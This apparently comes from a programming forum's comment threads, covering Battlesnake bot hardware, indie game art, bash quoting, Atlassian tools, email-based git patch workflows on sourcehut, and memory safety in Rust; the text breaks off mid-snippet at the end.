                                              I personally support anyone wanting to solve this game using machine learning, because that’s an interesting problem in itself, as long as they keep it from impeding/discouraging beginners :-)

                                              They have multiple divisions in the tournament (Beginner, Intermediate, Advanced). While that is not a perfect solution, because you can’t enforce it, in practice I think anyone training a neural net would take that to the Advanced division where it’s fair game and go for the gold. The Battlesnake community is full of friendlies and I doubt anyone would take that level of bot into the beginner’s division, which would just be blatantly unfair, and not really worth the Beginner prize in a tournament anyway. In Advanced, there’s still going to be a cut-off point where the cost of your hardware grows past the potential of winning a prize, and even then, there’s enough random chance in the game that it’s not a guaranteed win.

                                              1. 3

                                                If this ever became a legitimate problem, you could say “You must run your code on a Raspberry Pi” or “Your code will be run in a docker container with certain resource limits set”.
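A sketch of what the docker route could look like; the image name and the specific limit values below are placeholders, but the flags themselves are standard `docker run` options:

```shell
# Run an untrusted bot with capped CPU, memory, and process count.
# "mysnake:latest" and the limit values are hypothetical.
docker run --rm \
  --cpus=1 \
  --memory=256m \
  --pids-limit=64 \
  mysnake:latest
```

This levels the hardware playing field without requiring everyone to own identical machines.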

                                                1. 2

                                                  The problem is that you cannot enforce such requirements with what they have now, and moving to Docker containers could open up remote code execution problems, which are hard to deal with because sandboxing is hard. There is no universal solution. CodeCombat’s solution is to have their own language subsets, which lets them control how the code is executed. Obviously, the available techniques are then limited.

                                                  1. 2

                                                    The engine is open source and you can easily run it on your own network. So if you want to, you can host your own event where everyone brings a Raspberry Pi to run on.

                                                  2. 2

                                                    This seems like complaining that surfing is pay-to-win because some surfers can buy better boards. It’s not strictly incorrect, but it appears to be a great distance away from the point of surfing.

                                                  1. 13

                                                    He’s also overlooking one factor: this kind of art may attract users exactly because it’s ugly. To me it’s a form of signaling. What I read is: we don’t care about the big audience, we care about our niche, and you might be in this niche. If you are, you will enjoy this game more than most of the mainstream stuff out there. Nowadays most indie developers target very broad audiences and they are as uninteresting as the mainstream, rehashing the same 3 concepts and stories over and over. When I see ugly ass games I know that there I might find something worth my time.

                                                    I’m into strategy games and management games, not really RPG. Dwarf Fortress, Slitherine, Illwinter, they are all ugly as shit but you can dump hundreds of hours into them and be sure to find an amount of content that in a AAA game could never be produced, because scaling art is much much harder than scaling gaming systems.

                                                    Dominions couldn’t exist in any other form. Just imagine a planning meeting:

                                                    • Ok, for Dominions 5 we will have to hire 3D modelers and animators to make every unit animated. Now, how many distinct units do we have in the game?
                                                    • Some hundreds
                                                    • Yes, but exactly?
                                                    • I don’t know, we stopped counting after Dominions 2, they are just too many.

                                                    This kind of art to me signals that they are not bounded by the limits of visual representation and can create more freely and it should then be regarded as a selling point.

                                                    1. 9

                                                      Actually I think Vogel’s games look great. I also think Illwinter’s games look great. I feel like the modern 3d graphics style is just a trend, like ruffs in the 1500s. People look at anything without it now and go “aargh, my eyes!” but in the future it may be the other way around.

                                                      Other than that I agree 100%. Imagine Illwinter telling their fans “Hey we are removing 18/20 races and 90% of the units for the remaining races. Then we are spending our entire budget on making high-poly animated 3d models for what is left”.

                                                      They would get death threats.

                                                      They would also be ruining a great game. I wish more studios that have a real budget would spend it on gameplay and depth of content.

                                                      1. 6

                                                        Dwarf Fortress, Slitherine, Illwinter, they are all ugly as shit

                                                        They are all ugly as shit in the same way. They are consistent in their ugliness. Dwarf Fortress uses ASCII everywhere - there is zero mixing between ASCII and non-ASCII, and the style of ASCII is the same - one character is one thing. The same with other games - the color palette and style are consistent - however ugly they are. In Dominions 5 every unit is 2D - there is no mixing.

                                                        Inconsistency is the worst thing about Jeff’s style. It is arguably one of the easiest things to achieve and as screenshots is the thing that I’m likely to see the most while I’m choosing whether to buy it or not. And being inconsistent in style for me says that the game could very well be inconsistent in other aspects too.

                                                      1. 4

                                                        I don’t have an account on Zulip or on IRC. What is the “!qefs” problem? No search engine reveals it.

                                                        1. 8

                                                          "$Quote" "$Every" "$Fucking" "$Substitution"
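The mnemonic matters because unquoted expansions in shell undergo word splitting and globbing; a minimal demonstration:

```shell
# "Quote Every Fucking Substitution": unquoted expansions undergo
# word splitting and globbing; quoted ones are passed through intact.
f="my file.txt"

set -- $f          # unquoted: split into two words on whitespace
unquoted_count=$#

set -- "$f"        # quoted: preserved as a single word
quoted_count=$#

echo "unquoted=$unquoted_count quoted=$quoted_count"   # prints: unquoted=2 quoted=1
```

Passing the unquoted form to `rm`, `cp`, or a loop is the classic way to mangle filenames with spaces.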

                                                          1. 1

                                                            FWIW Googling “qefs bash” shows a bunch of references. I thought it was funny the first time I saw it … If I think back to 15 years ago when I first wrote bash, I think a code reviewer told me the same thing, haha.

                                                          1. 16

                                                            No need for my Atlassian account anymore…

                                                            1. 15

                                                              Agree. The only reason I had a BitBucket account was my mercurial repositories.

                                                              If only Atlassian could sunset JIRA. That would be nice…

                                                              1. 12

                                                                If only Atlassian could sunset JIRA. That would be nice…

                                                                 Like all right-thinking people, I detest JIRA and every microsecond I spend in it feels like a million agonizing years, but what’s the alternative for bug tracking? Most software of this ilk is not purchased by the people who have to use it, so it responds not to actual user pressure, but to CTO sales pressure. That’s my pet theory about why enterprise software is uniformly terrible, at least.

                                                                1. 6

                                                                   That’s my pet theory about why enterprise software is uniformly terrible, at least.

                                                                  That’s quite close to the theory of the old-timers I’ve asked about it, but there’s an important difference.

                                                                  CTOs ask consultants what software they should use. Consultants who recommend software that’s simple and easily configured go out of business, because most of the money is in helping clients configure/install/start using software.

                                                                  1. 3

                                                                    I like Phabricator much better, and it’s free software too.

                                                                    1. 2

                                                                      GitHub issues are fine.

                                                                    2. 1

                                                                      I do not understand the hate against JIRA. I think it is good software with many useful features. Yes, it can be abused to make tracking your issues really bad, but that is a problem of those who use the software, not of the software itself.

                                                                    3. 4

                                                                      Good luck actually closing your Atlassian account though :-( I’ve tried to do it many times but still get email from them occasionally when they discover vulnerabilities in products I’ve never used.

                                                                    1. 25

                                                                      With respect to email, don’t forget that pull requests were once intimidating too - as anyone who frequently works with onboarding new developers to its workflow can attest. To help make onboarding users with email easier, I wrote this tutorial:

                                                                      https://git-send-email.io

                                                                      I also wrote a rebase guide which applies to both workflows for making your changes more consistent and easier to review:

                                                                      https://git-rebase.io
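For reference, the end state the first tutorial works toward looks roughly like this; the SMTP server, user, and list addresses below are placeholders:

```shell
# One-time setup: tell git how to reach your SMTP server
# (all values here are hypothetical).
git config --global sendemail.smtpServer smtp.example.org
git config --global sendemail.smtpUser you@example.org
git config --global sendemail.smtpEncryption tls

# Send the most recent commit as a patch to the project's list.
git send-email --to="~maintainer/project-devel@lists.sr.ht" -1
```

After setup, sending a patch series is a single command against any range that `git format-patch` understands.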

                                                                      1. 26

                                                                        https://git-send-email.io

                                                                        That nicely outlines how to send patches, but I think people have far more difficulty receiving patches via email. Not everyone uses mutt, aerc, or runs a patchwork instance. Many mail clients, that people are otherwise generally fairly happy using, are just super not great at handling emailed patches. Emailed patches also generally don’t show a CI status that you can view ahead of time (I have heard of some, but I don’t ever remember seeing it firsthand in the wild).

                                                                        It’s great that it (an email patch workflow) works well with your workflows and tooling, but for some people it just… doesn’t work as well.

                                                                        1. 4

                                                                           I mean, those people who don’t have such a mail client are missing out. It’s like arguing that we should use SVN because not everyone has git installed, in my opinion. And testing your patches against SourceHut CI is pretty easy, before or after they’re sent.

                                                                          1. 26

                                                                            I think one issue is that for most of us, sending and receiving patches is a very small part of what we do with email, so choosing a mail client on that basis doesn’t make sense.

                                                                            1. 1

                                                                              But we aren’t forced to use only one mail client. I use several depending on context / the task at hand.

                                                                              1. 1

                                                                                I am curious about your multiclient workflow. Do you use multiple addresses, or use filters and one shared address? Or just all the mail in all of them?

                                                                                1. 4

                                                                                  Whether you use local maildir or IMAP, mail stores are designed for concurrent access. How many people check email on both their phone and their computer?

                                                                                  1. 1

                                                                                    Sure, but my question was specifically about their workflow with it.

                                                                                  2. 2

                                                                                    As it happens I do use multiple accounts for multiple “hats”, but that’s slightly orthogonal to multiple clients, which I use even for a single account. My daily driver is mutt; I use Thunderbird for the rare occasions when I need to see rendered HTML properly or perform a search (still haven’t got mairix or notmuch etc. set up), and I often use the iOS mail app, but mostly read-only.

                                                                                    At work we use Gmail. I check that from the iOS mail app too. I recently started configuring mutt to read my work mail as well, but it’s a work in progress, so I still regularly open the Gmail website.

                                                                              2. 23

                                                                                I mean, those people who don’t have such a mail client are missing out. It’s like arguing that we should use SVN because not everyone has git installed, in my opinion.

                                                                                To me it sounds a bit more like arguing “anyone who doesn’t ride a penny-farthing to work every day is totally missing out”.
                                                                                Well… maybe. I do find it unlikely that it is going to convince very many people who weren’t already riding them, or weren’t already inclined to do so. Even if it is amazing.

                                                                                Sidenote1: I may be wrong, but it even appears that Mutt itself uses gitlab instead of email based patches. If true, I find that oddly humorous.

                                                                                Sidenote2: I have nothing against email based patch flows, and if I am going to contribute to a project, I generally contribute in whatever form a project requires (within reason). But for my own projects, I do not desire an emailed patches based workflow (EPBW), nor do I desire to run/manage/admin/moderate(remove spam) a mailing list. That’s just me though.

                                                                                1. 7

                                                                                  To me it sounds a bit more like arguing “anyone who doesn’t ride a penny-farthing to work every day is totally missing out”.

                                                                                  I don’t really like this take. Having sunk thousands of hours into the GitHub, Gerrit, and email-driven workflows, I can confidently assert that the email-driven workflow, even setting aside the many respects in which it is politically and technically superior, is simply the most efficient for both contributors and maintainers. The penny farthing comparison is unfair.

                                                                                  Sidenote1: I may be wrong, but it even appears that Mutt itself uses gitlab instead of email based patches. If true, I find that oddly humorous.

                                                                                  Mutt uses Gitlab and mailing lists and Sourcehut, actually. The dominant avenue of contributions to mutt is through its hosted mailing list. They use Sourcehut CI, however.

                                                                                  Sidenote2: I have nothing against email based patch flows, and if I am going to contribute to a project, I generally contribute in whatever form a project requires (within reason). But for my own projects, I do not desire an emailed patches based workflow (EPBW), nor do I desire to run/manage/admin/moderate(remove spam) a mailing list. That’s just me though.

                                                                                  That’s why Sourcehut can do it for you.

                                                                                  1. 9

                                                                                    I don’t really like this take. Having sunk thousands of hours into the GitHub, Gerrit, and email-driven workflows, I can confidently assert that the email-driven workflow, even setting aside the many respects in which it is politically and technically superior, is simply the most efficient for both contributors and maintainers. The penny farthing comparison is unfair.

                                                                                    A bit of an “Ipse dixit”, but I’ll take it at face value anyway. To be clear, my comment was in response to your statement:

                                                                                    I mean, those people who don’t have such a mail client are missing out.

                                                                                    Which is what I made the comparison against. You have now pulled in other concerns in your response, and attributed them to the comment I made. I find that a bit uncharitable. I guess at this point we can just agree to disagree.

                                                                                    Mutt uses Gitlab and mailing lists and Sourcehut, actually. The dominant avenue of contributions to mutt is through its hosted mailing list. They use Sourcehut CI, however.

                                                                                    That’s odd. I looked through the last 2 months of their mutt-dev mailing list, and saw no mailed patches, but several gitlab PRs. Maybe I saw the wrong mailing list? Maybe I didn’t go back far enough? Overlooked it?
                                                                                    It doesn’t really matter, and I’ll take your word for it that they predominantly use emailed patches.

                                                                                    1. 2

                                                                                      The last 2 months have only seen one patch on Gitlab:

                                                                                      https://gitlab.com/muttmua/mutt/merge_requests?scope=all&utf8=%E2%9C%93&state=merged

                                                                                      After reviewing it myself I have to correct myself: I reckon that Gitlab and the mailing lists are at about an even pace these days.

                                                                                      1. 2

                                                                                        Do note: that was merged PRs. There were a couple of more (not many though!) in All which is what I looked at.

                                                                                2. 5

                                                                                  Not everyone is productive using such a mail client. Personally, I just plainly cannot remember more than a few shortcuts, which is already a massive roadblock to using CLI tools effectively, as most of them rely on shortcuts to increase productivity. They also do not present me with options of what I can do, and I cannot for the life of me remember what I can do in all the possible contexts, because, of course, the available options depend on the context you are currently in. Some people just aren’t productive using CLI tools, and saying that they “are missing out” because they plainly cannot use the tool effectively is simply gatekeeping.

                                                                                  1. 3

                                                                                    saying that they “are missing out” because they plainly cannot effectively use the tool is simply gatekeeping.

                                                                                    This is absurd. If a mechanic decides that he “is not a ratchet person” and will only ever use open-end wrenches, then I will question his professionalism just as I would question a software developer that “is not a CLI person” and will not learn to use a CLI mail client.

                                                                                    He doesn’t need to use the CLI mail client for his day-to-day email, but he should be capable of learning how to use it to handle the occasional emailed patches.

                                                                                    1. 5

                                                                                      Or this person will work with whatever they are paid to use (professionals are paid for their work, by definition!), but will only work with tools he/she finds enjoyable when doing charity. Thus FLOSS projects forcing inconvenient, last-century methods with arrogant communication are missing out on contributions.

                                                                                      I think the FLOSS community should focus on this kind of openness more, instead of CoCs.

                                                                                      1. 3

                                                                                        Good point. For work I’ll use whatever tools get the job done, no matter how gruesome. But for FOSS contributions, I agree that if the tool is difficult or simply frustrating to use, then it may as well not exist.

                                                                                      2. 1

                                                                                        Wrong assumption. The difference between using GUI and CLI clients is not like the difference between open-end and ratcheting wrenches. Using those wrenches is basically the same. Meanwhile the gap between using a CLI and a GUI mail client is much bigger. I’d compare it to using automatic and manual wood planes. You can work with higher precision and similar speed with a manual hand plane, but most carpenters would choose the automatic one, as it “just works” and doesn’t require as much skill and learning.

                                                                                        And why should you care what kind of wrench your car mechanic uses, if he does the job well? This isn’t a problem of not using better tools, but a problem of tool capabilities. The tools that an average developer uses do not represent the tools that were created for that workflow. And that is a problem.

                                                                                        1. 2

                                                                                          I’ll entertain the analogy to a wood plane, though I’m unfamiliar with the devices. You say it yourself: the manual wood plane is useful in certain circumstances but requires skill. So does the CLI mail client. Use the automatic wood plane where it fits, but at least learn the skill to use the manual wood plane where the higher precision is necessary.

                                                                                          A developer that refuses to acquire a skill is simply not professional.

                                                                                          1. 1

                                                                                            It’s not like it requires much skill. It is basically the same skill. The difference is, you need to move the manual wood plane along the plank 10 times, while with the automatic one you only need to move it once and the motor does its job. Some people just don’t have the patience and/or physical stamina to use a manual wood plane. The manual hand plane is in fact more configurable, and can be used in more specialized scenarios. So enthusiasts use hand planes. Your average carpenter does not.

                                                                                            1. 2

                                                                                              The analogy was not mine.

                                                                                      3. 0

                                                                                        Consider acme?

                                                                                        1. 2

                                                                                          I am unable to find such an email client. And the point is, for a workflow to be usable by a wide range of people, it should require as few new tools as possible that duplicate the ones people already use. And in the case of email clients, most people probably like their current email client and do not want to change it. So they, in turn, do not want to switch to this new workflow, which, while it potentially increases productivity, requires them to switch to tools they do not like.

                                                                                          1. 4

                                                                                            acme is a text editor which can be easily coaxed into being a mail client.

                                                                                            Consider as well that you needn’t discard your daily mail client in order to adopt another. What difference does it make if some technology is backed by email or by some other protocol? Just because you already have an HTTP client (e.g. your web browser) doesn’t mean another isn’t useful (e.g. curl).

                                                                                            1. 7

                                                                                              Acme does not seem generally user-friendly. My colleagues all use JetBrains IDEs and Thunderbird as their mail client, and acme would be a downgrade for their experience. I might use it, but they wouldn’t. If I cannot offer them a good GUI email interface, there is no way they would switch to an email-based workflow.

                                                                                              1. 0

                                                                                                I was recommending acme particularly for you, given the following:

                                                                                                I just plainly cannot remember more than a few shortcuts

                                                                                                If your colleagues won’t join you I consider your colleagues to be in the wrong, not the software. A bicycle is easier to use than a car but it’s not going to get you to the other end of town in time for the movie.

                                                                                                1. 14

                                                                                                  If your colleagues won’t join you I consider your colleagues to be in the wrong, not the software.

                                                                                                  Don’t you think peace within a team is more important than any particular software or workflow? Or, to put it another way, the feelings of people are more important than any workflow, so if a large group of people reject a workflow, it’s better to conclude that the workflow is wrong for those people than to say that those people are wrong.

                                                                                                  1. 7

                                                                                                    My colleagues wouldn’t join me not because the workflow is bad, but because there is no tooling suitable for both them and the workflow. If tooling for a specific workflow just isn’t comfortable for me, I’m just not going to use it.

                                                                                                    1. -8

                                                                                                      Then you ought to be coding in BASIC. Good things often require effort.

                                                                                                      Edit: this comment seems to be being misinterpreted, so a clarification: I’m not earnestly suggesting that he should use BASIC. I’m extending his logic to an incorrect conclusion to demonstrate the flaw in his argument. Most languages are harder than BASIC, therefore BASIC is more comfortable, therefore why ever learn anything else? Obviously it doesn’t make sense.

                                                                                                      1. 18

                                                                                                        You are literally making the exact same argument that @ignaloidas’ colleagues are. The only difference is that the intersection of the tooling you find suitable and the tooling they find suitable is the null set. They want to be in JetBrains’ IDEs; you want to be in email. You built tooling that demands an email-based workflow because it’s what you want and then tell them they have to change; they’ve got tooling that demands GitHub (or a workalike) and then tell their colleagues that they have to change.

                                                                                                        As an aside, I pay for and generally enjoy using Sourcehut, and I respect your diehard allegiance to email, but you’ve got to quit acting like this in the threads. I get that you love an email-based workflow, and find it superior for your use cases. Having used Git and Mercurial since, what, early 2006 I guess—certainly before GitHub and Bitbucket existed—I disagree (especially when your workflow starts to involve binary assets, so most websites, games, mobile apps, and so on), but I’m also comfy in that workflow, and happy to support an SCM that fully supports that flow. But if you insist that people who do not use your workflow are wrong, and do so in this offensive manner, you’re going to start losing customers.

                                                                                                        And as an aside to that aside, you need to do what you want with Sourcehut, but the fighting against this on principles to me, as a former SCM lead, looks a bit forced: looking at this whole thread, and thinking back to a very early comment, all you’d have to do to satisfy him is to make temporary branch names that can be pulled in some mechanism based on the patch series. That’s it. It’s not trivial, but it’s also not that difficult, since you’re already doing 90% of that with the patch view. If you don’t want to do it, that’s fine, but it seems like that’d still mandate patch-accessible workflows, while also meeting the PR crowd a bit.

                                                                                                        1. 2

                                                                                                          A note about the JetBrains IDEs: it’s not like they are incompatible with an email-driven workflow; they just have tools that are better suited to a pull-request workflow. I gave JetBrains IDEs as an example of what an “average” developer, as I know them, uses from day to day, as it seems that many bloggers have a distorted view of the “average” developer. The average developer actually doesn’t want to fiddle with settings and try 10 different variants before deciding to use one. They want tools that “just work” without massive setup. The average carpenter wants a table saw that simply does the job; they do not fiddle around with it to make it the best saw for them.

                                                                                                        2. 14

                                                                                                          Hi this is not a very nice tone, please try to argue in good faith.

                                                                                                          1. 13

                                                                                                            Is insulting prospective customers really the best way to grow your business?

                                                                                                            1. 0

                                                                                                              That was no insult, it was a logical extension of his logic. I didn’t mean it sincerely, I was using it to explain his error.

                                                                                                            2. 2

                                                                                                              Ok, in simpler terms. I would probably still use an SUV instead of a Smart even if the Smart can take some shorter paths, because I feel cramped when driving it. Same with software. Some software is in fact more useful than other software, but is harder or less convenient for some people to use than software without those fancy features.

                                                                                                              1. -5

                                                                                                                This isn’t such a case. This is a case where you (or your colleagues, I’m not sure at this point) are refusing to try unfamiliar things and, being ignorant of the experience, asserting it’s worse.

                                                                                                                1. 3

                                                                                                                  It is. The thing is, I have tried mutt and aerc, and the problem is that I just plainly am not comfortable using bigger CLI programs, that is, those whose scope goes beyond pipes and command-line arguments. About the only programs of that style that I can use are nano and htop, and only because they have a handy shortcut guide at the bottom at all times. Acme is also not the kind of editor I would like to use casually. It is easy to blame the people who don’t use it without understanding the reasons why they don’t.

                                                                                                                  1. 0

                                                                                                                    You didn’t know anything of acme even 2 hours ago. You’ve evaluated it in that time?

                                                                                                                    Herein lies my point. I have a vision and I must at some point exercise my creative authority over the project to secure that vision. Yes, it’s different from what you’re used to. You can construct reasons to excuse this away, but I fundamentally believe that being unwilling to learn something new is the underlying problem. As evidence, I submit that there’s no way you could have given acme a fair evaluation since my suggestion of it. I don’t consider this sort of behavior acceptable cause for changing my system’s design to accommodate it.

                                                                                                                    1. 12

                                                                                                                      As someone who used Acme for two years, @ignaloidas does not sound like someone for whom Acme would even be worth trying. It’s great, but incredibly dependent on how you want to use your editor. You can’t disable word wrap, or use any shortcut to move the cursor down a column, for Christ’s sake. It’s really not for everybody (perhaps not even most people).

                                                                                                    2. 2

                                                                                                      So they, in turn, do not want to switch to this new workflow, which, while potentially increases productivity, requires them to switch to tools they do not like.

                                                                                                      What happened to using the right tool for the job?

                                                                                                      1. 1

                                                                                                        The question here is not about “the right tool for the job” but about the usability of those tools for a wider audience. Currently I do not see the majority of developers switching to an email-based workflow, purely because of the usability of the tools. “Rockstar developers” think that CLI’s are very usable and productive, but that is not the case for the average programmer.

                                                                                                        1. 3

                                                                                                          “Rockstar developers” think that CLI’s are very usable and productive, but that is not the case for the average programmer.

                                                                                                          Good to know that we were all rockstars for decades without realizing it!

                                                                                                          This is probably just an age thing but I don’t know any professional programmers who aren’t comfortable with CLIs.

                                                                                                          1. 3

                                                                                                            There is the CLI, and there are CLI applications. Git is used through the CLI. Vim is a CLI application. Surely you know at least one professional programmer who isn’t comfortable with Vim and the like.

                                                                                                2. 3

                                                                                                  I am not particularly experienced at using git with email. One problem I have had in the past is when I want to pull in a patchset from a mailing list archive, where either I am not subscribed to the mailing list, or wasn’t subscribed at the time the patches were sent. Can these mail clients help me with this problem? (By contrast, I find it very easy to add a branch / PR as a remote and pull or cherry-pick commits that way.)

                                                                                                  1. 3

                                                                                                    lists.sr.ht, the sourcehut web archive for mailing lists, has a little copy+paste command line thing you can use to import any patch (or patchset) into your local git repo. Here’s an example:

                                                                                                    https://lists.sr.ht/~sircmpwn/aerc/patches/7471

                                                                                                    On the right, expand the “how do I use this” box and a short command is given there.

                                                                                                    Integration directly with your mail client would require more development but isn’t necessarily out of the question.
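                                                                                                    Under the hood, an import command like the one the archive generates boils down to standard git plumbing. The sketch below shows the round trip locally, with `git format-patch` standing in for the contributor’s email and `git am` for the maintainer’s import; all repository names, paths, and the commit message are invented for the demo.

```shell
# Demo of the email patch round trip; every name here is made up.
set -e
work=$(mktemp -d)

# "Upstream" repository with a single empty starting commit.
git init -q "$work/upstream"
git -C "$work/upstream" -c user.name=Demo -c user.email=demo@example.com \
    commit -q --allow-empty -m "initial commit"

# A contributor clones, commits a change, and exports it as an
# mbox-style patch file -- the file that would be sent to the list.
git clone -q "$work/upstream" "$work/contrib"
echo "fix" > "$work/contrib/fix.txt"
git -C "$work/contrib" add fix.txt
git -C "$work/contrib" -c user.name=Demo -c user.email=demo@example.com \
    commit -q -m "add fix"
git -C "$work/contrib" format-patch -1 -o "$work/patches" > /dev/null

# The maintainer applies the emailed patch; -3 falls back to a
# three-way merge if the patch does not apply cleanly.
git -C "$work/upstream" -c user.name=Demo -c user.email=demo@example.com \
    am -3 "$work/patches"/0001-*.patch
git -C "$work/upstream" log --oneline -n 1
```

                                                                                                    The web archive’s copy+paste command is essentially the second half of this: fetch the mbox for the patchset, pipe it into `git am -3`.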

                                                                                                    1. 3

                                                                                                      That’s good to see, but presumably doesn’t help for non-sourcehut mailing lists?

                                                                                                      1. 3

                                                                                                        No, I’m afraid that there are fewer good solutions for non-sourcehut mailing lists. Patchwork has a similar feature, if the list in question has it set up. You could also ask someone else for a copy of the mail. I don’t think this damns the idea; it just shows that we need better software to support the idea - which is what sourcehut tries to be.

                                                                                              2. 2

                                                                                                I am still trying to find some time to check out Sourcehut. My only concern is how to configure it to run CI builds on mailing list patches as I couldn’t find it anywhere in the docs.

                                                                                                1. 1

                                                                                                  This hasn’t been implemented yet, but it will be soon.

                                                                                                  1. 1

                                                                                                    Great. If that happens I will think about migrating some of my personal projects to Sourcehut, as it seems like a pretty nice solution.

                                                                                              1. 1

                                                                                                There seems to be a belief amongst memory safety advocates that it is not one out of many ways in which software can fail, but the most critical one in existence today, and that, if programmers can’t be convinced to switch languages, maybe management can be made to force them.

                                                                                                I didn’t see this kind of zeal when (for example) PHP software fell prey to SQL injections left and right, but I’m trying to understand it. The quoted statistics about found vulnerabilities seem unconvincing, and are just as likely to indicate that static analysis tools have made these kinds of programming errors easy to find in existing codebases.

                                                                                                1. 19

                                                                                                  Not all vulnerabilities are equal. I prioritize those that give attackers full control over my computer. They’re the worst. They can lead to every other problem. Plus, their rootkits or damage might not let you have it back. You can lose the physical property, too. Alex’s field evidence shows memory unsafety causes around 70-80% of this. So, worrying about hackers hitting native code, it’s rational to spend 70-80% of one’s effort eliminating memory unsafety.

                                                                                                  More damning is that languages such as Go and D make it easy to write high-performance, maintainable code that’s also memory safe. Go is easier to learn with a huge ecosystem behind it, too. Ancient Java being 10-15x slower than C++ made for a good reason not to use it. Now, most apps are bloated/slow, the market uses them anyway, some safe languages are really lean/fast, using them brings those advantages, and so there’s little reason left for memory-unsafe languages. Even in intended use cases, one can often use a mix of memory-safe and -unsafe languages with unsafe used on performance-sensitive or lowest-level parts of the system. Moreover, safer languages such as Ada and Rust give you guarantees by default on much of that code allowing you to selectively turn them off only where necessary.

                                                                                                  If you are using unsafe languages and have money, there are also tools that automatically eliminate most of the memory unsafety bugs. That companies pulling in 8-9 digits still have piles of them shows total negligence. Same with those in open-source development who aren’t doing much better. So, on that side of things, whatever tool you encourage should lead to memory safety even with apathetic, incompetent, or rushed developers working on code with complex interactions. Doubly true if it’s multi-threaded and/or distributed. A safe, orderly-by-default setup will prevent loads of inevitable problems.

                                                                                                  1. 13

                                                                                                    The quoted statistics about found vulnerabilities seem unconvincing

                                                                                                    If studies by security teams at Microsoft and Google, and analysis of Apple’s software is not enough for you, then I don’t know what else could convince you.

                                                                                                    These companies have huge incentives to prevent exploitable vulnerabilities in their software. They get the best developers they can, they are pouring many millions of dollars into preventing these kinds of bugs, and still regularly ship software with vulnerabilities caused by memory unsafety.

                                                                                                    The “why bother with one class of bugs, if another class of bugs exists too” position is not conducive to writing secure software.

                                                                                                    1. 3

                                                                                                      The “why bother with one class of bugs, if another class of bugs exists too” position is not conducive to writing secure software.

                                                                                                      No - but neither is pretending that you can eliminate a whole class of bugs for free. Memory safe languages are free of bugs caused by memory unsafety - but at what cost?

                                                                                                      What other classes of bugs do they make more likely? What is the development cost? Or the runtime performance cost?

                                                                                                      I don’t claim to have the answers but a study that did is the sort of thing that would convince me. Do you know of any published research like this?

                                                                                                      1. 9

                                                                                                        No - but neither is pretending that you can eliminate a whole class of bugs for free. Memory safe languages are free of bugs caused by memory unsafety - but at what cost?

                                                                                                        What other classes of bugs do they make more likely? What is the development cost? Or the runtime performance cost?

                                                                                                        The principal cost of memory safety in Rust, IMO, is that the set of valid programs is more heavily constrained. You often hear this manifest as “fighting with the borrow checker.” This is definitely an impediment. I think a large portion of folks get past this stage, in the sense that “fighting the borrow checker” is, for the most part, a temporary hurdle. But there are undoubtedly certain classes of programs that Rust will make harder to write, even for Rust experts.

                                                                                                        Like all trade offs, the hope is that the juice is worth the squeeze. That’s why there has been a lot of effort in making Rust easier to use, and a lot of effort put into returning good error messages.

                                                                                                        I don’t claim to have the answers but a study that did is the sort of thing that would convince me. Do you know of any published research like this?

                                                                                                        I’ve seen people ask this before, and my response is always, “what hypothetical study would actually convince you?” If you think about it, it is startlingly difficult to do such a study. There are many variables to control for, and I don’t see how to control for all of them.

                                                                                                        IMO, the most effective way to show this is probably to reason about vulnerabilities due to memory safety in aggregate. But to do that, you need a large corpus of software written in Rust that is also widely used. But even this methodology is not without its flaws.

                                                                                                        1. 2

                                                                                                          If you think about it, it is startlingly difficult to do such a study. There are many variables to control for, and I don’t see how to control for all of them.

                                                                                                          That’s true - but my comment was in response to one claiming that the bug surveys published by Microsoft et al should be convincing.

                                                                                                          I could imagine something similar being done with large Rust code bases in a few years, perhaps.

                                                                                                          I don’t have enough Rust experience to have a good intuition on this so the following is just an example. I have lots of C++ experience with large code bases that have been maintained over many years by large teams. I believe that C++ makes it harder to write correct software: not (just) because of memory safety issues, undefined behavior etc. but also because the language is so large, complex and surprising. It is possible to write good C++ but it is hard to maintain it over time. For that reason, I have usually promoted C rather than C++ where there has been a choice.

                                                                                                          That was a bit long-winded but the point I was trying to make is that languages can encourage or discourage different classes of bugs. C and C++ have the same memory safety and undefined behavior issues but one is more likely than the other to engender other bugs.

                                                                                                          It is possible that Rust is like C++, i.e. that its complexity encourages other bugs even as its borrow checker prevents memory safety bugs. (I am not now saying that is true, just raising the possibility.)

                                                                                                          This sort of consideration does not seem to come up very often when people claim that Rust is obviously better than C for operating systems, for example. I would love to read an article that takes this sort of thing into account - written by someone with more relevant experience than me!

                                                                                                          1. 7

                                                                                                            I’ve been writing Rust for over 4 years (after more than a decade of C), and in my experience:

                                                                                                            • For me Rust has completely eliminated memory unsafety bugs. I don’t even use debuggers or Valgrind any more, unless I’m integrating Rust with C.
                                                                                                            • I used to have, at least during development, all kinds of bugs that spray the heap, corrupt some data somewhere, use uninitialized memory, use-after-free. Now I get compile-time errors or panics (which are safe, technically like C++ exceptions).
                                                                                                            • I get fewer bugs overall. Lack of NULL and mandatory error handling are amazing for reliability.
                                                                                                            • Built-in unit test framework, richer standard library and easy access to 3rd party dependencies help too (e.g. instead of hand-rolling another own buggy hash table, I use a well-tested well-optimized one).
                                                                                                            • My Rust programs are much faster. Single-threaded Rust is 95% as fast as single-threaded C, but I can easily parallelize way more than I’d ever dare in C.
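                                                                                                            A minimal sketch of two of the points above (the function names here are made up for illustration): the dangling-reference bug class that Rust rejects at compile time, shown as a comment, and `Option` in place of NULL, which forces the caller to handle absence:

```rust
// The class of bug Rust rejects at compile time: a dangling reference.
// This snippet does not compile:
//
//     let r;
//     {
//         let s = String::from("temp");
//         r = &s; // error[E0597]: `s` does not live long enough
//     }
//     println!("{}", r);
//
// And instead of NULL, Option forces the caller to handle absence:
fn first_even(xs: &[i32]) -> Option<i32> {
    xs.iter().copied().find(|x| x % 2 == 0)
}

fn main() {
    assert_eq!(first_even(&[1, 3, 4]), Some(4));
    assert_eq!(first_even(&[1, 3, 5]), None); // no null, no crash: just None
}
```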

                                                                                                            The costs:

                                                                                                            • Rust’s compile times are not nice.
                                                                                                            • It took me a while to become productive in Rust. “Getting” ownership requires unlearning C and a lot of practice. However, I’m not fighting the borrow checker any more, and I’m more productive in Rust thanks to higher-level abstractions (e.g. I can write map/reduce iterator that collects something into a btree — in 1 line).
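                                                                                                            The kind of one-liner mentioned above might look like this (the example data is made up): map items to key/value pairs and collect them straight into an ordered map.

```rust
use std::collections::BTreeMap;

fn main() {
    // One line: map each word to its length, collect into an ordered map.
    let lengths: BTreeMap<&str, usize> =
        ["apple", "fig", "kiwi"].iter().map(|w| (*w, w.len())).collect();

    assert_eq!(lengths.get("fig"), Some(&3));
    // BTreeMap keeps keys sorted, so iteration order is deterministic.
    let keys: Vec<&str> = lengths.keys().copied().collect();
    assert_eq!(keys, ["apple", "fig", "kiwi"]);
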